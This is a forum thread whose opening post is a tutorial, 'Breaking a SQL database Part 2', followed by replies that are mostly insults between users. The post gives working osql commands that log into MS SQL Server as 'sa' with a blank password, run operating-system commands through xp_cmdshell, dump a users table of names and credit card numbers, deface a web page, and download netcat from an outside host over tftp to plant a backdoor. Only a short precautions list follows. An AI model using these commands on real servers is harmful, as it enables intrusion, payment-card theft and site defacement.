Breaking a SQL database Part 2

CourtneyDS

Baseband Member
Messages
56
Part 2

Code:
C:>osql.exe -?
osql: unknown option ?
usage: osql              [-U login id]          [-P password]
  [-S server]            [-H hostname]          [-E trusted connection]
  [-d use database name] [-l login timeout]     [-t query timeout]
  [-h headers]           [-s colseparator]      [-w columnwidth]
  [-a packetsize]        [-e echo input]        [-I Enable Quoted Identifiers]
  [-L list servers]      [-c cmdend]
  [-q "cmdline query"]   [-Q "cmdline query" and exit]
  [-n remove numbering]  [-m errorlevel]
  [-r msgs to stderr]    [-V severitylevel]
  [-i inputfile]         [-o outputfile]
  [-p print statistics]  [-b On error batch abort]
  [-O use Old ISQL behavior disables the following]
      <EOF> batch processing
      Auto console width scaling
      Wide messages
      default errorlevel is -1 vs 1
  [-? show syntax summary]


------------------------------------------------

Well.. this displays the help of the osql tool ... Its clear from the help what we have to do now. Type

C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa" ...

Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...

C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell ‘dir >dir.txt'"

I would prefer to use -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...

A smart attacker will install a backdoor on the machine to gain access to in future also :). Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"

And

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"

Code:
Output:

Username          Some Numbers ?                  expdate
-----------      ------------                   ----------
David Lindon     1234567890987654         2004-10-03 00:00:00.000
Overlord         0987654321234567         2004-07-02 00:00:00.000
jasynder         2312345678909878         2004-08-07 00:00:00.000
Eyelfixit        3456789012345678         2004-03-02 00:00:00.000
Write something in index.html file ?

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"

Want to upload any file on the remote system ...

C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell ‘tftp 234.432.12.21 GET nc.exe c:\nc.exe'"

Precautionay measures
---------------------------
Code:
<*>    Change the default password for sa. 
<*>    Delete all the default stored procedures.
<*>    Filter out all the characters like ',",--,:,etc.  
<*>    Keep upto date with  patches
<*>    Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls ...


Sincerely
Courtney_DS
 
do it up girlfriend, will take me some practice but ill get it. gotta modify it but its a fukin kick arse code
 
you cant do it beioch, you dont even know what it is n ur tryin to act like you do! jus shut up dude cuz ur a fool!
 
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundat information to look good then I will say something.


Sorry, ahahahahahahahahaha
 
eyelfixit said:
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundat information to look good then I will say something.


Sorry, ahahahahahahahahaha

say somethin, you aint sayin sheoit, all ur doin is copyin from other sites, you dont know nothin n peeps can see that dude. ur not doin good makin urself look like ur important! go find a girl dude cuz this aint ur bag, ur ignorant bro!
 
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especialy by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you. :)
 
eyelfixit said:
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especialy by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you. :)


nobody cares what you think dude. you aint no admin on lti cuz you cant be trusted! courts n her boys busted ur arse up deleting all ur posts n ur dumb! nobody wants sheoit to work against you bro, ur makin more a fool of yourself wit every post you make!
 
eyelfixit said:
I was just telling other people that what you say is false. that's all. :)


ah ha ha ha, there are peeps postin code that can be altered real quick n ur postin cut and paste crap. give it a rest bro unless you like makin a fool of urself.
 
Back
Top Bottom